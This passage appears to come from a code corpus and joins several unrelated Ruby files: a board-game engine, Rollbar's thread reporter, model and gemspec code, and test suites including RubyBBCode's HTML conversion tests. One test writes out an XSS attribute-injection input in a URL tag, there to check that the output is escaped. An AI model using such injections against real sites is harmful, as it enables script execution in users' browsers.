token = corporation.find_token_by_type
return unless city.tokenable?(corporation, tokens: token)
@log << "#{corporation.name} places a token on #{hex.name}"
city.place_token(corporation, token)
end
def add_new_share(share)
owner = share.owner
corporation = share.corporation
corporation.share_holders[owner] += share.percent if owner
owner.shares_by_corporation[corporation] << share
@_shares[share.id] = share
end
def convert_capital(corporation, emergency)
steps = emergency ? 3 : 2
5 * stock_market.find_share_price(corporation, [:left] * steps).price
end
def convert_to_ten_share(corporation, price_drops = 0, blame_president = false)
# update corporation type and report conversion
corporation.type = :'10-share'
@log << (if blame_president
"#{corporation.owner.name} converts #{corporation.id} into a 10-share corporation"
else
"#{corporation.id} converts into a 10-share corporation"
end)
# update existing shares to 10% shares
original_shares = shares_for_corporation(corporation)
corporation.share_holders.clear
original_shares.each { |s| s.percent = 10 }
original_shares.first.percent = 20
original_shares.each { |s| corporation.share_holders[s.owner] += s.percent }
# create new shares
owner = corporation.floated? ? @share_pool : corporation
shares = Array.new(5) { |i| Share.new(corporation, percent: 10, index: i + 4, owner: owner) }
shares.each do |share|
add_new_share(share)
end
# create new tokens and remove reminder from charter
corporation.abilities.dup.each do |ability|
if ability&.description&.start_with?('Conversion tokens:')
ability.count.times { corporation.tokens << Engine::Token.new(corporation, price: 50) }
corporation.remove_ability(ability)
end
end
# update share price
unless price_drops.zero?
prev = corporation.share_price.price
price_drops.times { @stock_market.move_down(corporation) }
log_share_price(corporation, prev)
end
# add new capital
return unless corporation.floated?
capital = corporation.share_price.price * 5
@bank.spend(capital, corporation)
@log << "#{corporation.id} receives #{format_currency(capital)}"
end
def stock_round
Engine::Round::Stock.new(self, [
Engine::Step::HomeToken,
G18GB::Step::BuySellParShares,
])
end
def hex_blocked_by_ability?(_entity, ability, hex)
phase.tiles.include?(:blue) ? false : super
end
def special_green_hexes(corporation)
return {} unless corporation&.corporation?
corporation.abilities.flat_map { |a| a.type == :tile_lay ? a.hexes.map { |h| [h, a.tiles] } : [] }.to_h
end
def add_new_special_green_hex(corporation, hex_coords)
ability = {
type: 'tile_lay',
hexes: [hex_coords],
tiles: %w[G36 G37 G38],
cost: 0,
reachable: true,
consume_tile_lay: true,
description: "May place a green tile in #{hex_coords}",
desc_detail: "May place a green tile in #{hex_coords}, instead of the usual yellow tile, even before green tiles " \
'are normally available',
}
corporation.add_ability(Engine::Ability::TileLay.new(**ability))
end
def upgrades_to?(from, to, special = false, selected_company: nil)
corporation = @round.current_entity
sgh = special_green_hexes(corporation)
if to.color == :green &&
sgh.include?(from.hex.coordinates) &&
sgh[from.hex.coordinates].include?(to.name) &&
Engine::Tile::COLORS.index(to.color) > Engine::Tile::COLORS.index(from.color)
return true
end
super
end
def upgrades_to_correct_color?(from, to)
(from.color == to.color && from.color == :blue) || super
end
def legal_tile_rotation?(_entity, _hex, tile)
return super unless tile.color == :blue
tile.rotation.zero?
end
def route_trains(entity)
return super unless insolvent?(entity)
[@depot.min_depot_train]
end
def express_train?(train)
train.name.end_with?('X')
end
def train_owner(train)
train.owner == @depot ? lessee : train.owner
end
def lessee
current_entity
end
def revenue_bonuses(route, stops)
stop_hexes = stops.map { |stop| stop.hex.name }
@companies.select { |co| co.owner == route&.corporation&.owner }.flat_map do |co|
if co.value.positive?
[]
else
co.abilities.select { |ab| ab.type == :hex_bonus }.flat_map do |ab|
ab.hexes.select { |h| stop_hexes.include?(h) }.map { |_| { revenue: ab.amount, description: co.sym } }
end
end
end
end
def revenue_info(route, stops)
standard = revenue_bonuses(route, stops) + estuary_bonuses(route) + compass_bonuses(route)
return standard unless express_train?(route.train)
standard + distance_bonus(route, stops)
end
def revenue_for(route, stops)
# count only unique hexes in determining revenue
stop_revenues = stops.uniq { |s| s.hex.name }.map { |s| s.route_revenue(route.phase, route.train) }
stop_revenues.sum + revenue_info(route, stops).sum { |bonus| bonus[:revenue] }
end
def revenue_str(route)
route.stops.map { |s| s.hex.name }.join('-') + revenue_info(route, route.stops).map do |bonus|
if bonus[:description] == 'X'
"+#{format_currency(bonus[:revenue])}"
else
"+(#{bonus[:description]})"
end
end.join
end
def compass_points_in_network(network_hexes)
@scenario['compass-hexes'].reject { |_compass, compass_hexes| (network_hexes & compass_hexes).empty? }.map(&:first)
end
def ns_bonus
20
end
def ew_bonus
if @phase.status.include?('bonus_20_40')
40
elsif @phase.status.include?('bonus_20_30')
30
else
20
end
end
def routes_intersect(first, second)
!(first.visited_stops & second.visited_stops).empty?
end
def route_sets_intersect(first, second)
first.any? { |a| second.any? { |b| routes_intersect(a, b) } }
end
def combine_route_sets(sets)
# simplify overlapping route sets by combining them where possible
overlapped = []
sets.combination(2).select { |first, second| route_sets_intersect(first, second) }.each do |first, second|
overlapped << second
second.each { |route| first << route }
end
sets.reject { |set| overlapped.include?(set) }
end
def route_sets(routes)
sets = routes.map { |route| [route] }
return [] if sets.empty?
prev_length = 0
while sets.size != prev_length
prev_length = sets.size
sets = combine_route_sets(sets)
end
sets
end
def compass_bonuses(route)
bonuses = []
return bonuses if route.chains.empty?
route_set = route_sets(route.routes).find { |set| set.include?(route) } || []
return bonuses unless route == route_set.first # apply bonus to the first route in the set
hexes = route_set.flat_map { |r| r.ordered_paths.map { |path| path.hex.coordinates } }
points = compass_points_in_network(hexes)
bonuses << { revenue: ns_bonus, description: 'NS' } if points.include?('N') && points.include?('S')
bonuses << { revenue: ew_bonus, description: 'EW' } if points.include?('E') && points.include?('W')
bonuses
end
def estuary_bonuses(route)
route.ordered_paths.map do |path|
if path.hex.coordinates == 'I4' && path.track == :dual
{ revenue: 40, description: 'FT' }
elsif path.hex.coordinates == 'C22' && path.track == :dual
{ revenue: 30, description: 'S' }
end
end.compact
end
def distance_bonus(route, _stops)
return [] if route.chains.empty?
visited = route.visited_stops.reject { |stop| stop.hex.tile.cities.empty? && stop.hex.tile.offboards.empty? }
start = visited.first.hex
finish = visited.last.hex
[{ revenue: hex_crow_distance(start, finish) * 10, description: 'X' }]
end
def hex_crow_distance(start, finish)
dx = (start.x - finish.x).abs
dy = (start.y - finish.y).abs
dx + [0, (dy - dx) / 2].max
end
def buy_train(operator, train, price = nil)
@train_bought = true
super
end
def new_operating_round(round_num = 1)
@train_bought = false
super
end
def operating_round(round_num)
G18GB::Round::Operating.new(self, [
G18GB::Step::SpecialChoose,
Engine::Step::SpecialTrack,
G18GB::Step::SpecialToken,
Engine::Step::HomeToken,
G18GB::Step::TrackAndToken,
G18GB::Step::Route,
G18GB::Step::Dividend,
Engine::Step::DiscardTrain,
G18GB::Step::BuyTrain,
G18GB::Step::EMRShareBuying,
], round_num: round_num)
end
def or_round_finished
depot.export! unless @train_bought
end
def end_now?(after)
if @round.is_a?(round_end) && @depot.upcoming.size == 1 && !@train_bought
@depot.export!
return true
end
super
end
end
end
end
end
| 31.232222 | 128 | 0.524316 |
1cbc3d11a7eff0b0af9e8482e6ca0975b7ed9ffd | 1,063 | require 'spec_helper'
# Specs for Guard::Handlebars::Formatter: each formatter method should
# delegate to the corresponding Guard::UI / Guard::Notifier call, with
# error/success additionally wrapping the message in ANSI color codes.
# Uses legacy RSpec `should_receive` message expectations.
describe Guard::Handlebars::Formatter do
  subject { Guard::Handlebars::Formatter }

  describe '.info' do
    it 'output Guard::UI.info' do
      ::Guard::UI.should_receive(:info).once.with('a.handlebars', {})
      subject.info('a.handlebars')
    end
  end

  describe '.debug' do
    it 'output Guard::UI.debug' do
      ::Guard::UI.should_receive(:debug).once.with('a.handlebars', {})
      subject.debug('a.handlebars')
    end
  end

  describe '.error' do
    it 'colorize Guard::UI.error' do
      # NOTE(review): the expected string interleaves the escape sequences
      # oddly ("\e[0" + "\e[31m" + "m..."); it mirrors whatever the
      # formatter emits today — confirm against the implementation.
      ::Guard::UI.should_receive(:error).once.with("\e[0\e[31mma.handlebars\e[0m", {})
      subject.error('a.handlebars')
    end
  end

  describe '.success' do
    it 'colorize Guard::UI.info' do
      # Green (32) variant of the same colorized output as .error above.
      ::Guard::UI.should_receive(:info).once.with("\e[0\e[32mma.handlebars\e[0m", {})
      subject.success('a.handlebars')
    end
  end

  describe '.notify' do
    it 'output Guard::Notifier.notify' do
      ::Guard::Notifier.should_receive(:notify).once.with('a.handlebars', {})
      subject.notify('a.handlebars')
    end
  end
end
| 24.72093 | 86 | 0.638758 |
215702ade7b63c336d12e4e2d56b7a30fecd8ddf | 14,288 | require 'test_helper'
# Exercises String#bbcode_to_html across the supported tag set: inline
# formatting, lists, quotes, links, media embeds, escaping, tag
# enabling/disabling, custom tag definitions, and error handling.
class RubyBbcodeHtmlTest < Minitest::Test
  # Reset any tag-list/configuration changes a previous test made.
  def before_setup
    RubyBBCode.reset
  end

  def test_multiline
    assert_equal "line1<br />\nline2", "line1\nline2".bbcode_to_html
    assert_equal "line1<br />\nline2", "line1\r\nline2".bbcode_to_html
    assert_equal "<ul>\n<li>line1</li>\n<li>line2</li>\n</ul>", "[ul]\n[li]line1[/li]\n[li]line2[/li]\n[/ul]".bbcode_to_html
    assert_equal "<strong><br />\nline 1<br />\nline 2</strong>", "[b]\nline 1\nline 2[/b]".bbcode_to_html
  end

  def test_strong
    assert_equal '<strong>simple</strong>', '[b]simple[/b]'.bbcode_to_html
    assert_equal "<strong>line 1<br />\nline 2</strong>", "[b]line 1\nline 2[/b]".bbcode_to_html
  end

  def test_em
    assert_equal '<em>simple</em>', '[i]simple[/i]'.bbcode_to_html
    assert_equal "<em>line 1<br />\nline 2</em>", "[i]line 1\nline 2[/i]".bbcode_to_html
  end

  def test_u
    assert_equal '<u>simple</u>', '[u]simple[/u]'.bbcode_to_html
    assert_equal "<u>line 1<br />\nline 2</u>", "[u]line 1\nline 2[/u]".bbcode_to_html
  end

  def test_code
    assert_equal '<pre>simple</pre>', '[code]simple[/code]'.bbcode_to_html
    assert_equal "<pre>line 1<br />\nline 2</pre>", "[code]line 1\nline 2[/code]".bbcode_to_html
  end

  def test_strikethrough
    assert_equal '<span style="text-decoration:line-through;">simple</span>', '[s]simple[/s]'.bbcode_to_html
    assert_equal "<span style=\"text-decoration:line-through;\">line 1<br />\nline 2</span>", "[s]line 1\nline 2[/s]".bbcode_to_html
  end

  def test_size
    assert_equal '<span style="font-size: 32px;">32px Text</span>', '[size=32]32px Text[/size]'.bbcode_to_html
  end

  def test_color
    assert_equal '<span style="color: red;">Red Text</span>', '[color=red]Red Text[/color]'.bbcode_to_html
    assert_equal '<span style="color: #ff0023;">Hex Color Text</span>', '[color=#ff0023]Hex Color Text[/color]'.bbcode_to_html
  end

  def test_center
    assert_equal '<div style="text-align:center;">centered</div>', '[center]centered[/center]'.bbcode_to_html
  end

  def test_ordered_list
    assert_equal '<ol><li>item 1</li><li>item 2</li></ol>', '[ol][li]item 1[/li][li]item 2[/li][/ol]'.bbcode_to_html
  end

  def test_unordered_list
    assert_equal '<ul><li>item 1</li><li>item 2</li></ul>', '[ul][li]item 1[/li][li]item 2[/li][/ul]'.bbcode_to_html
  end

  # [list] with [*] items is the classic forum shorthand for [ul]/[li].
  def test_list_common_syntax
    assert_equal '<ul><li>item 1</li><li>item 2</li></ul>', '[list][*]item 1[*]item 2[/list]'.bbcode_to_html
    assert_equal '<ul><li><strong>item 1</strong> test</li><li>item 2</li></ul>', '[list][*][b]item 1[/b] test[*]item 2[/list]'.bbcode_to_html
  end

  def test_newline_list_common_syntax
    assert_equal "<ul>\n<li>item 1</li>\n<li>item 2</li>\n\n</ul>", "[list]\n[*]item 1\n[*]item 2\n\n[/list]".bbcode_to_html
  end

  def test_list_common_syntax_explicit_closing
    assert_equal '<ul><li>item 1</li><li>item 2</li></ul>', '[list][*]item 1[/*][*]item 2[/*][/list]'.bbcode_to_html
  end

  def test_two_lists
    assert_equal '<ul><li>item1</li><li>item2</li></ul><ul><li>item1</li><li>item2</li></ul>',
                 '[ul][li]item1[/li][li]item2[/li][/ul][ul][li]item1[/li][li]item2[/li][/ul]'.bbcode_to_html
  end

  # Whitespace between list tags must be preserved, not treated as stray text.
  def test_whitespace_in_only_allowed_tags
    assert_equal "<ol>\n<li>item 1</li>\n<li>item 2</li>\n</ol>",
                 "[ol]\n[li]item 1[/li]\n[li]item 2[/li]\n[/ol]".bbcode_to_html
    assert_equal "<ol> <li>item 1</li> <li>item 2</li>\t</ol>",
                 "[ol] [li]item 1[/li] [li]item 2[/li]\t[/ol]".bbcode_to_html
  end

  def test_quote
    assert_equal '<div class="quote">quoting</div>', '[quote]quoting[/quote]'.bbcode_to_html
    assert_equal "<div class=\"quote\">\nquoting\n</div>", "[quote]\nquoting\n[/quote]".bbcode_to_html
    assert_equal "<div class=\"quote\">\nfirst line<br />\nsecond line\n</div>", "[quote]\nfirst line\nsecond line\n[/quote]".bbcode_to_html
    assert_equal '<div class="quote"><strong>someone wrote:</strong>quoting</div>', '[quote=someone]quoting[/quote]'.bbcode_to_html
    assert_equal '<div class="quote"><strong>Kitten wrote:</strong><div class="quote"><strong>creatiu wrote:</strong>f1</div>f2</div>',
                 '[quote=Kitten][quote=creatiu]f1[/quote]f2[/quote]'.bbcode_to_html
  end

  def test_link
    assert_equal '<a href="http://www.google.com">http://www.google.com</a>', '[url]http://www.google.com[/url]'.bbcode_to_html
    assert_equal '<a href="http://google.com">Google</a>', '[url=http://google.com]Google[/url]'.bbcode_to_html
    assert_equal '<a href="http://google.com"><strong>Bold Google</strong></a>', '[url=http://google.com][b]Bold Google[/b][/url]'.bbcode_to_html
    assert_equal '<a href="/index.html">Home</a>', '[url=/index.html]Home[/url]'.bbcode_to_html
  end

  def test_image
    assert_equal '<img src="http://www.ruby-lang.org/images/logo.gif" alt="" />',
                 '[img]http://www.ruby-lang.org/images/logo.gif[/img]'.bbcode_to_html
    assert_equal '<img src="http://www.ruby-lang.org/images/logo.gif" width="95" height="96" alt="" />',
                 '[img=95x96]http://www.ruby-lang.org/images/logo.gif[/img]'.bbcode_to_html
    assert_equal '<img src="http://www.ruby-lang.org/images/logo.gif" width="123" height="456" alt="" />',
                 '[img width=123 height=456]http://www.ruby-lang.org/images/logo.gif[/img]'.bbcode_to_html
  end

  def test_youtube
    assert_equal '<iframe id="player" type="text/html" width="400" height="320" src="http://www.youtube.com/embed/E4Fbk52Mk1w?enablejsapi=1" frameborder="0"></iframe>',
                 '[youtube]E4Fbk52Mk1w[/youtube]'.bbcode_to_html
    assert_equal '<iframe id="player" type="text/html" width="640" height="480" src="http://www.youtube.com/embed/E4Fbk52Mk1w?enablejsapi=1" frameborder="0"></iframe>',
                 '[youtube width=640 height=480]E4Fbk52Mk1w[/youtube]'.bbcode_to_html
  end

  # The video id should be extracted from a full watch URL, not just a bare id.
  def test_youtube_with_full_url
    full_url = 'http://www.youtube.com/watch?feature=player_embedded&v=E4Fbk52Mk1w'
    assert_equal '<iframe id="player" type="text/html" width="400" height="320" src="http://www.youtube.com/embed/E4Fbk52Mk1w?enablejsapi=1" frameborder="0"></iframe>',
                 "[youtube]#{full_url}[/youtube]".bbcode_to_html
  end

  def test_youtube_with_url_shortener
    full_url = 'http://www.youtu.be/cSohjlYQI2A'
    assert_equal '<iframe id="player" type="text/html" width="400" height="320" src="http://www.youtube.com/embed/cSohjlYQI2A?enablejsapi=1" frameborder="0"></iframe>',
                 "[youtube]#{full_url}[/youtube]".bbcode_to_html
  end

  # HTML in the input must be entity-escaped regardless of the escape flag here.
  def test_html_escaping
    assert_equal '<strong>&lt;i&gt;foobar&lt;/i&gt;</strong>', '[b]<i>foobar</i>[/b]'.bbcode_to_html
    assert_equal '<strong><i>foobar</i></strong>', '[b]<i>foobar</i>[/b]'.bbcode_to_html(false)
    assert_equal '1 is &lt; 2', '1 is < 2'.bbcode_to_html
    assert_equal '1 is < 2', '1 is < 2'.bbcode_to_html(false)
    assert_equal '2 is &gt; 1', '2 is > 1'.bbcode_to_html
    assert_equal '2 is > 1', '2 is > 1'.bbcode_to_html(false)
  end

  def test_uri_escaping
    # There is no tag available, so create our own to test URI escaping
    escape_param_def = {
      escapequery: {
        html_open: '<a href="%query%">%between%', html_close: '</a>',
        require_between: true, allow_quick_param: false, allow_between_as_param: true,
        param_tokens: [{ token: :query, uri_escape: true }]
      }
    }
    assert_equal '<a href="Escaped+string+%28to+be+used+as+URL+%26+more%29">Escaped string (to be used as URL &amp; more)</a>',
                 '[escapequery]Escaped string (to be used as URL & more)[/escapequery]'.bbcode_to_html(true, escape_param_def)
    assert_equal '<a href="http%3A%3A%2Fwww.text.com%2Fpage.php%3Fparam1%3D1%26param2%3D2">http::/www.text.com/page.php?param1=1&amp;param2=2</a>',
                 '[escapequery]http::/www.text.com/page.php?param1=1&param2=2[/escapequery]'.bbcode_to_html(true, escape_param_def)
  end

  # Disabled tags are left as literal text; their children still render.
  def test_disable_tags
    assert_equal '[b]foobar[/b]', '[b]foobar[/b]'.bbcode_to_html(true, {}, :disable, :b)
    assert_equal '[b]<em>foobar</em>[/b]', '[b][i]foobar[/i][/b]'.bbcode_to_html(true, {}, :disable, :b)
    assert_equal '[b][i]foobar[/i][/b]', '[b][i]foobar[/i][/b]'.bbcode_to_html(true, {}, :disable, :b, :i)
  end

  def test_enable_tags
    assert_equal '<strong>foobar</strong>', '[b]foobar[/b]'.bbcode_to_html(true, {}, :enable, :b)
    assert_equal '<strong>[i]foobar[/i]</strong>', '[b][i]foobar[/i][/b]'.bbcode_to_html(true, {}, :enable, :b)
    assert_equal '<strong><em>foobar</em></strong>', '[b][i]foobar[/i][/b]'.bbcode_to_html(true, {}, :enable, :b, :i)
  end

  # The bang variant converts in place, mutating the receiver.
  def test_to_html_bang_method
    foo = '[b]foobar[/b]'
    assert_equal '<strong>foobar</strong>', foo.bbcode_to_html!
    assert_equal '<strong>foobar</strong>', foo
  end

  def test_addition_of_tags
    mydef = {
      test: {
        html_open: '<test>', html_close: '</test>',
        description: 'This is a test',
        example: '[test]Test here[/test]'
      }
    }
    assert_equal 'pre <test>Test here</test> post', 'pre [test]Test here[/test] post'.bbcode_to_html(true, mydef)
    assert_equal 'pre <strong><test>Test here</test></strong> post', 'pre [b][test]Test here[/test][/b] post'.bbcode_to_html(true, mydef)
  end

  def test_multiple_tag_test
    assert_equal '<strong>bold</strong><em>italic</em><u>underline</u><div class="quote">quote</div><a href="https://test.com">link</a>',
                 '[b]bold[/b][i]italic[/i][u]underline[/u][quote]quote[/quote][url=https://test.com]link[/url]'.bbcode_to_html
  end

  # Quotes injected through a URL parameter must come out entity-escaped.
  def test_no_xss_hax
    expected = "<a href=\"http://www.google.com&quot; onclick=\"javascript:alert\">google</a>"
    assert_equal expected, '[url=http://www.google.com" onclick="javascript:alert]google[/url]'.bbcode_to_html
  end

  def test_media_tag
    input1 = '[media]http://www.youtube.com/watch?v=cSohjlYQI2A[/media]'
    input2 = '[media]http://vimeo.com/46141955[/media]'

    output1 = '<iframe id="player" type="text/html" width="400" height="320" src="http://www.youtube.com/embed/cSohjlYQI2A?enablejsapi=1" frameborder="0"></iframe>'
    output2 = '<iframe src="http://player.vimeo.com/video/46141955?badge=0" width="400" height="320" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe>'

    assert_equal output1, input1.bbcode_to_html
    assert_equal output2, input2.bbcode_to_html
  end

  def test_vimeo_tag
    input = '[vimeo]http://vimeo.com/46141955[/vimeo]'
    input2 = '[vimeo]46141955[/vimeo]'
    output = '<iframe src="http://player.vimeo.com/video/46141955?badge=0" width="400" height="320" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe>'

    assert_equal output, input.bbcode_to_html
    assert_equal output, input2.bbcode_to_html
    assert_equal '<iframe src="http://player.vimeo.com/video/46141955?badge=0" width="640" height="480" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe>',
                 '[vimeo width=640 height=480]46141955[/vimeo]'.bbcode_to_html
  end

  # Behavior for unknown tags is configurable: raise, strip, or keep as text.
  def test_unknown_tag
    RubyBBCode.configuration.ignore_unknown_tags = :exception
    assert_raises RuntimeError do
      '[unknown]This is an unknown tag[/unknown]'.bbcode_to_html
    end
    RubyBBCode.configuration.ignore_unknown_tags = :ignore
    assert_equal 'This is an unknown tag', '[unknown]This is an unknown tag[/unknown]'.bbcode_to_html
    RubyBBCode.configuration.ignore_unknown_tags = :text
    assert_equal '[unknown]This is an unknown tag[/unknown]', '[unknown]This is an unknown tag[/unknown]'.bbcode_to_html
  end

  def test_raised_exceptions
    # Test whether exceptions are raised when the BBCode contains errors
    assert_raises RuntimeError do
      'this [b]should raise an exception'.bbcode_to_html
    end
    assert_raises RuntimeError do
      '[ul][li]item 1[li]item 2[/ul]'.bbcode_to_html
    end
  end

  # Tag matching is case-insensitive, in any open/close combination.
  def test_uppercase
    assert_equal '<strong>simple</strong>', '[B]simple[/B]'.bbcode_to_html
    assert_equal "<strong>line 1<br />\nline 2</strong>", "[B]line 1\nline 2[/B]".bbcode_to_html
  end

  def test_uppercase_with_params
    assert_equal '<span style="font-size: 4px;">simple</span>', '[SIZE=4]simple[/SIZE]'.bbcode_to_html
    assert_equal "<span style=\"font-size: 4px;\">line 1<br />\nline 2</span>", "[SIZE=4]line 1\nline 2[/SIZE]".bbcode_to_html
  end

  def test_uppercase_at_tag_open
    assert_equal '<strong>simple</strong>', '[B]simple[/b]'.bbcode_to_html
    assert_equal "<strong>line 1<br />\nline 2</strong>", "[B]line 1\nline 2[/b]".bbcode_to_html
  end

  def test_uppercase_at_tag_close
    assert_equal '<strong>simple</strong>', '[b]simple[/B]'.bbcode_to_html
    assert_equal "<strong>line 1<br />\nline 2</strong>", "[b]line 1\nline 2[/B]".bbcode_to_html
  end

  def test_nested_uppercase_tags
    assert_equal '<ul><li>item 1</li><li>item 2</li></ul>', '[UL][LI]item 1[/LI][LI]item 2[/LI][/UL]'.bbcode_to_html
    assert_equal "<ul><li>line 1<br />\nline 2</li><li>line 1<br />\nline 2</li></ul>", "[UL][LI]line 1\nline 2[/LI][LI]line 1\nline 2[/LI][/UL]".bbcode_to_html
  end

  def test_parent_uppercase_in_nested_tags
    assert_equal '<ul><li>item 1</li><li>item 2</li></ul>', '[UL][li]item 1[/li][li]item 2[/li][/UL]'.bbcode_to_html
    assert_equal "<ul><li>line 1<br />\nline 2</li><li>line 1<br />\nline 2</li></ul>", "[UL][li]line 1\nline 2[/li][li]line 1\nline 2[/li][/UL]".bbcode_to_html
  end

  # Checking the HTML output is the only way to see whether a tag is recognized
  # The BBCode validity test ignores unknown tags (and treats them as text)
  def test_modified_taglist
    assert_equal '<strong>simple</strong>', '[b]simple[/b]'.bbcode_to_html

    tags = RubyBBCode::Tags.tag_list
    b_tag = tags.delete :b
    begin
      # Make sure we captured the contents of the b-tag
      assert b_tag.instance_of? Hash
      # Now no HTML is generated, as the tag is removed
      assert_equal '[b]simple[/b]', '[b]simple[/b]'.bbcode_to_html
    ensure
      # Always restore as this change is permanent (and messes with other tests)
      tags[:b] = b_tag
    end
    # Restored to the original/correct situation
    assert_equal '<strong>simple</strong>', '[b]simple[/b]'.bbcode_to_html
  end
end
| 48.931507 | 188 | 0.672172 |
26dd3830f2d32ef826b9d3764d76dbc777cd25f1 | 1,798 | require 'thread'
require 'timeout'
module Rollbar
  module Delay
    # Async delivery strategy that reports each payload on its own Ruby
    # thread. A single background "reaper" thread joins finished sender
    # threads (via a Queue), and an at_exit hook drains the queue so the
    # process does not exit with reports still in flight.
    class Thread
      # Sentinel pushed onto the queue to tell the reaper to stop.
      EXIT_SIGNAL = :exit
      # Seconds the at_exit hook waits for outstanding sender threads.
      EXIT_TIMEOUT = 3

      Error = Class.new(StandardError)
      TimeoutError = Class.new(Error)

      class << self
        attr_reader :reaper

        # Entry point used by Rollbar: spawn the reaper (once), start a
        # sender thread for the payload, register it for reaping, and
        # return the thread.
        def call(payload)
          spawn_threads_reaper

          thread = new.call(payload)
          threads << thread

          thread
        end

        private

        # Thread-safe queue of sender threads awaiting a join.
        def threads
          @threads ||= Queue.new
        end

        # Start the reaper thread and install the exit handler exactly once.
        def spawn_threads_reaper
          return if @spawned

          @spawned = true
          @reaper ||= build_reaper_thread
          configure_exit_handler
        end

        # Blocks on the queue, joining each finished sender thread until
        # the EXIT_SIGNAL sentinel arrives.
        def build_reaper_thread
          ::Thread.start do
            loop do
              thread = threads.pop
              break if thread == EXIT_SIGNAL

              thread.join
            end
          end
        end

        # On process exit: signal the reaper to stop and wait for it to
        # drain remaining sender threads, raising TimeoutError if that
        # takes longer than EXIT_TIMEOUT seconds.
        def configure_exit_handler
          at_exit do
            begin
              Timeout.timeout(EXIT_TIMEOUT) do
                threads << EXIT_SIGNAL
                reaper.join
              end
            rescue Timeout::Error
              raise TimeoutError, "unable to reap all threads within #{EXIT_TIMEOUT} seconds"
            end
          end
        end
      end # class << self

      # Send one payload on a fresh thread. ::Thread (top-level constant)
      # is used to avoid clashing with this class's own name.
      def call(payload)
        ::Thread.new do
          begin
            Rollbar.process_from_async_handler(payload)
          rescue
            # Here we swallow the exception:
            # 1. The original report wasn't sent.
            # 2. An internal error was sent and logged
            #
            # If users want to handle this in some way they
            # can provide a more custom Thread based implementation
          end
        end
      end
    end
  end
end
| 22.197531 | 93 | 0.521691 |
d576fd8c293951a4314341de809254f56ae1a8f5 | 649 | # == Schema Information
#
# Table name: professors
#
# id :integer not null, primary key
# first :string
# last :string
# university :string
# created_at :datetime not null
# updated_at :datetime not null
#
# A university professor; users rate professors through nested Rating records.
class Professor < ActiveRecord::Base
  has_many :ratings, dependent: :destroy

  # Discard nested rating rows that are missing any of the required fields.
  accepts_nested_attributes_for :ratings,
                                reject_if: lambda { |attributes|
                                  attributes['course'].blank? ||
                                    attributes['comment'].blank? ||
                                    attributes['rating'].blank?
                                }

  validates :first, :last, :university, presence: true

  # Display name in "First Last" form.
  def name
    first + ' ' + last
  end
end
| 25.96 | 165 | 0.676425 |
e9b9aaa7a78de63cb841c95741a2a07ec509ca7f | 1,809 |
# Make lib/ loadable so the version constant can be required below.
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "gametracker/version"

# NOTE(review): this is Bundler scaffold output — the TODO placeholders in
# summary/description/homepage/metadata must be filled in before release.
Gem::Specification.new do |spec|
  spec.name          = "gametracker"
  spec.version       = Gametracker::VERSION
  spec.authors       = ["'Ali Karimi'"]
  spec.email         = ["'[email protected]'"]

  spec.summary       = %q{TODO: Write a short summary, because RubyGems requires one.}
  spec.description   = %q{TODO: Write a longer description or delete this line.}
  spec.homepage      = "TODO: Put your gem's website or public repo URL here."
  spec.license       = "MIT"

  # Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
  # to allow pushing to a single host or delete this section to allow pushing to any host.
  if spec.respond_to?(:metadata)
    spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"

    spec.metadata["homepage_uri"] = spec.homepage
    spec.metadata["source_code_uri"] = "TODO: Put your gem's public repo URL here."
    spec.metadata["changelog_uri"] = "TODO: Put your gem's CHANGELOG.md URL here."
  else
    # Guard for pre-2.0 RubyGems, which has no metadata support at all.
    raise "RubyGems 2.0 or newer is required to protect against " \
      "public gem pushes."
  end

  # Specify which files should be added to the gem when it is released.
  # The `git ls-files -z` loads the files in the RubyGem that have been added into git.
  spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
    `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
  end
  spec.bindir        = "exe"
  spec.executables   = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
  spec.require_paths = ["lib"]

  spec.add_development_dependency "bundler", "~> 2.0"
  spec.add_development_dependency "rake", "~> 10.0"
end
| 43.071429 | 96 | 0.673853 |
e9f8a47886cf618eeec2eb889c897d3d252a0b0d | 420 | class BenchmarkChannel < ApplicationCable::Channel
STREAMS = (1..10).to_a
# Log the new subscriber, then attach it to a broadcast stream. With
# ENV['SAMPLED'] set, a random index from STREAMS is appended to the base
# name "all"; otherwise every client shares the single "all" stream.
def subscribed
  Rails.logger.info("a client subscribed: #{id}")
  suffix = ENV['SAMPLED'] ? STREAMS.sample : nil
  stream_from("all#{suffix}")
end
# Send the received payload straight back to this subscriber.
def echo(data)
  transmit data
end
# Fan the payload out to a stream (randomly sampled when ENV['SAMPLED'] is
# set), then acknowledge the sender by echoing the payload back tagged as
# a broadcast result. Note: the incoming hash is mutated on purpose.
def broadcast(data)
  target = "all#{STREAMS.sample if ENV['SAMPLED']}"
  ActionCable.server.broadcast(target, data)
  data["action"] = "broadcastResult"
  transmit(data)
end
end
| 22.105263 | 79 | 0.690476 |
f8a61762ca1d1f973528ea27bb1bb9e3a7bdc622 | 4,030 | #encoding: utf-8
class Option
include Comparable
TYPES = ["*", "bool", "float", "[float]", "int", "string", "[string]", "table", "[table]"]
attr_reader :name,
:category,
:default,
:description,
:display,
:enum,
:examples,
:null,
:options,
:partition_key,
:relevant_when,
:templateable,
:type,
:unit
def initialize(hash)
# Options can have sub-options (tables)
options_hashes = hash["options"]
if !options_hashes.nil?
@options =
options_hashes.collect do |sub_name, sub_hash|
self.class.new(sub_hash.merge("name" => sub_name))
end
else
@options = []
end
@name = hash.fetch("name")
@default = hash["default"]
@display = hash["display"]
@description = hash.fetch("description")
@enum = hash["enum"]
@examples = hash["examples"] || []
@null = hash.fetch("null")
@partition_key = hash["partition_key"] == true
@relevant_when = hash["relevant_when"]
@simple = hash["simple"] == true
@templateable = hash["templateable"] == true
@type = hash.fetch("type")
@unit = hash["unit"]
@category = hash["category"] || ((@options.empty? || inline?) ? "General" : @name.humanize)
if [email protected]_a?(TrueClass) && [email protected]_a?(FalseClass)
raise ArgumentError.new("#{self.class.name}#null must be a boolean")
end
if !@relevant_when.nil? && !@relevant_when.is_a?(Hash)
